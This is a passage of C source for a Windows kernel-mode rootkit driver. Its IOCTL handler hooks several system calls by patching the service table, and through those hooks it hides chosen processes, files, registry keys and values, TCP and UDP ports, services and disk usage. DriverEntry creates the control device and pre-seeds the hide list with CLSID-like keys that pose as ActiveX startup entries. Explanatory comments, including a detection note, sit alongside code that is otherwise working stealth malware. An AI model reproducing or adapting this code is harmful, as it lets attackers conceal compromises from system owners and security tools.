//DbgPrint("buf: %ws", buf);
break;
case CODEMSG(PROCESS_CODE):
if( !ZwQuerySystemInformationHooked ) {
if( !MDLinit ) {
if( !NT_SUCCESS(initMDL()) ) {
Irp->IoStatus.Status = STATUS_UNSUCCESSFUL;
break;
}
}
ZwQuerySystemInformationAddress =(ZWQUERYSYSTEMINFORMATION)
(SYSTEMSERVICE(ZwQuerySystemInformation));
__asm cli
HOOK_SYSCALL( ZwQuerySystemInformation,
ZwQuerySystemInformationHook,
ZwQuerySystemInformationAddress );
__asm sti
ZwQuerySystemInformationHooked = TRUE;
}
AddObjectToHide( ProcessToHide, &NbProcessToHide, buf, &(Irp->IoStatus.Status));
break;
case CODEMSG(FILE_CODE):
if( !ZwQueryDirectoryFileHooked ) {
if( !MDLinit ) {
if( !NT_SUCCESS(initMDL()) ) {
Irp->IoStatus.Status = STATUS_UNSUCCESSFUL;
break;
}
}
ZwQueryDirectoryFileAddress = (ZWQUERYDIRECTORYFILE)
(SYSTEMSERVICE(ZwQueryDirectoryFile));
__asm cli
HOOK_SYSCALL( ZwQueryDirectoryFile,
ZwQueryDirectoryFileHook,
ZwQueryDirectoryFileAddress );
__asm sti
ZwQueryDirectoryFileHooked = TRUE;
}
AddObjectToHide( FileToHide, &NbFileToHide, buf, &(Irp->IoStatus.Status));
break;
case CODEMSG(REGKEY_CODE):
if( !ZwEnumerateKeyHooked ) {
if( !MDLinit ) {
if( !NT_SUCCESS(initMDL()) ) {
Irp->IoStatus.Status = STATUS_UNSUCCESSFUL;
break;
}
}
ZwEnumerateKeyAddress = (ZWENUMERATEKEY)(SYSTEMSERVICE(ZwEnumerateKey));
__asm cli
HOOK_SYSCALL( ZwEnumerateKey,
ZwEnumerateKeyHook,
ZwEnumerateKeyAddress );
__asm sti
ZwEnumerateKeyHooked = TRUE;
}
AddObjectToHide( RegKeyToHide, &NbRegKeyToHide, buf, &(Irp->IoStatus.Status));
break;
case CODEMSG(REGVALUE_CODE):
if( !ZwEnumerateValueKeyHooked ) {
if( !MDLinit ) {
if( !NT_SUCCESS(initMDL()) ) {
Irp->IoStatus.Status = STATUS_UNSUCCESSFUL;
break;
}
}
ZwEnumerateValueKeyAddress = (ZWENUMERATEVALUEKEY)
(SYSTEMSERVICE(ZwEnumerateValueKey));
__asm cli
HOOK_SYSCALL( ZwEnumerateValueKey,
ZwEnumerateValueKeyHook,
ZwEnumerateValueKeyAddress );
__asm sti
ZwEnumerateValueKeyHooked = TRUE;
}
AddObjectToHide( RegValueToHide, &NbRegValueToHide, buf, &(Irp->IoStatus.Status));
break;
case CODEMSG(TCP_PORT_CODE):
if( !ZwDeviceIoControlFileHooked ) {
if( !MDLinit ) {
if( !NT_SUCCESS(initMDL()) ) {
Irp->IoStatus.Status = STATUS_UNSUCCESSFUL;
break;
}
}
ZwDeviceIoControlFileAddress = (ZWDEVICEIOCONTROLFILE)
(SYSTEMSERVICE(ZwDeviceIoControlFile));
__asm cli
HOOK_SYSCALL( ZwDeviceIoControlFile,
ZwDeviceIoControlFileHook,
ZwDeviceIoControlFileAddress );
__asm sti
ZwDeviceIoControlFileHooked = TRUE;
}
port = (PUSHORT)buf;
for(i=0; i<NbTcpPortToHide; i++)
if( *port == TcpPortToHide[i] )
// port already hidden
hidden = TRUE;
if( !hidden && NbTcpPortToHide < 1024) {
TcpPortToHide[ NbTcpPortToHide ] = *port;
NbTcpPortToHide++;
}
break;
case CODEMSG(UDP_PORT_CODE):
if( !ZwDeviceIoControlFileHooked ) {
if( !MDLinit ) {
if( !NT_SUCCESS(initMDL()) ) {
Irp->IoStatus.Status = STATUS_UNSUCCESSFUL;
break;
}
}
ZwDeviceIoControlFileAddress = (ZWDEVICEIOCONTROLFILE)
(SYSTEMSERVICE(ZwDeviceIoControlFile));
__asm cli
HOOK_SYSCALL( ZwDeviceIoControlFile,
ZwDeviceIoControlFileHook,
ZwDeviceIoControlFileAddress );
__asm sti
ZwDeviceIoControlFileHooked = TRUE;
}
port = (PUSHORT)buf;
for(i=0; i<NbUdpPortToHide; i++)
if( *port == UdpPortToHide[i] )
hidden = TRUE;
if( !hidden && NbUdpPortToHide < 1024) {
UdpPortToHide[ NbUdpPortToHide ] = *port;
NbUdpPortToHide++;
}
break;
case CODEMSG(SERVICE_CODE):
Irp->IoStatus.Status = HideFromSCManager( buf );
break;
case CODEMSG(DISK_SPACE_CODE):
if( !ZwQueryVolumeInformationFileHooked ) {
if( !MDLinit ) {
if( !NT_SUCCESS(initMDL()) ) {
Irp->IoStatus.Status = STATUS_UNSUCCESSFUL;
break;
}
}
ZwQueryVolumeInformationFileAddress = (ZWQUERYVOLUMEINFORMATIONFILE)
(SYSTEMSERVICE(ZwQueryVolumeInformationFile));
__asm cli
HOOK_SYSCALL( ZwQueryVolumeInformationFile,
ZwQueryVolumeInformationFileHook,
ZwQueryVolumeInformationFileAddress );
__asm sti
ZwQueryVolumeInformationFileHooked = TRUE;
}
break;
default:
Irp->IoStatus.Status = STATUS_INVALID_DEVICE_REQUEST;
}
// the .exe's DeviceIOControl blocks until we exec the IoCompleteRequest
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return Irp->IoStatus.Status;
}
/*
 * DriverEntry - load-time initialization of the driver.
 *
 * Creates the control device (name taken from the DEVICE macro) and its
 * DOS-namespace symbolic link (DOSDEVICE), fills in the IRP dispatch table,
 * and pre-seeds the registry-key hide list with two CLSID-like names.
 *
 * Parameters:
 *   DriverObject - driver object supplied by the I/O manager; its DriverUnload
 *                  and MajorFunction slots are written here.
 *   RegistryPath - the driver's service key path; not read by this routine.
 *
 * Returns STATUS_NO_SUCH_DEVICE when the device or the symbolic link cannot be
 * created (the underlying IoCreateDevice / IoCreateSymbolicLink status is not
 * propagated), otherwise STATUS_SUCCESS.
 *
 * Detection note: the named device object and the symbolic link created here
 * are ordinary kernel objects visible to object-namespace enumeration, and
 * they form the user-mode control channel for the syscall hooks installed by
 * the IRP_MJ_DEVICE_CONTROL handler (IOManager, defined above this routine).
 * AddObjectToHide only records the two names below; the ZwEnumerateKey hook
 * that consults RegKeyToHide is installed lazily by IOManager's REGKEY_CODE
 * case, not here.
 */
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
    UNICODE_STRING DeviceName;
    UNICODE_STRING DosDeviceName;
    NTSTATUS status;
    //DbgPrint("Driver loaded.");
    // Unload is defined elsewhere in this file (outside this view).
    DriverObject->DriverUnload = Unload;
    // Build the counted strings for the NT device name and its DOS alias.
    RtlInitUnicodeString(&DeviceName, DEVICE);
    RtlInitUnicodeString(&DosDeviceName, DOSDEVICE);
    // The device is the endpoint user mode opens to send IOCTLs to this driver.
    // DriverDeviceObject is presumably a file-scope global declared outside
    // this view; it is also used by IoDeleteDevice below.
    status = IoCreateDevice(
        DriverObject,         // ptr to caller object
        0,                    // device extension size: none requested
        &DeviceName,          // device name
        FILE_DEVICE_UNKNOWN,  // generic device type, no class-specific semantics
        0,                    // no special characteristics
        FALSE,                // not exclusive: multiple handles may be open at once
        &DriverDeviceObject); // [OUT] ptr to the created object
    if ( !NT_SUCCESS(status) )
        // Real failure code is dropped; callers only see STATUS_NO_SUCH_DEVICE.
        return STATUS_NO_SUCH_DEVICE;
    // The DOS symbolic link is what makes the device reachable by a Win32 path.
    status = IoCreateSymbolicLink(&DosDeviceName,&DeviceName);
    if( !NT_SUCCESS(status) ) {
        // Roll back the device so the object namespace is left clean on failure.
        IoDeleteDevice( DriverDeviceObject );
        //DbgPrint("Failed to create symbolic link");
        return STATUS_NO_SUCH_DEVICE;
    }
    // Dispatch table: create/close/read/write go to IODispatch, IOCTLs to IOManager.
    DriverObject->MajorFunction[IRP_MJ_CREATE] = IODispatch;
    DriverObject->MajorFunction[IRP_MJ_CLOSE] = IODispatch;
    DriverObject->MajorFunction[IRP_MJ_READ] = IODispatch;
    DriverObject->MajorFunction[IRP_MJ_WRITE] = IODispatch;
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = IOManager;
    // Pre-seed the registry-key hide list with the driver's own ActiveX startup
    // keys. The status written by AddObjectToHide is never examined: this
    // routine returns STATUS_SUCCESS regardless of whether the entries were added.
    AddObjectToHide( RegKeyToHide, &NbRegKeyToHide, L"{232f4e3f2-bab8-11d0-97b9-00c04f98bcb9}", &status);
    AddObjectToHide( RegKeyToHide, &NbRegKeyToHide, L"{256dc5e0e-7c46-11d3-b5bf-0000f8695621}", &status);
    return STATUS_SUCCESS;
}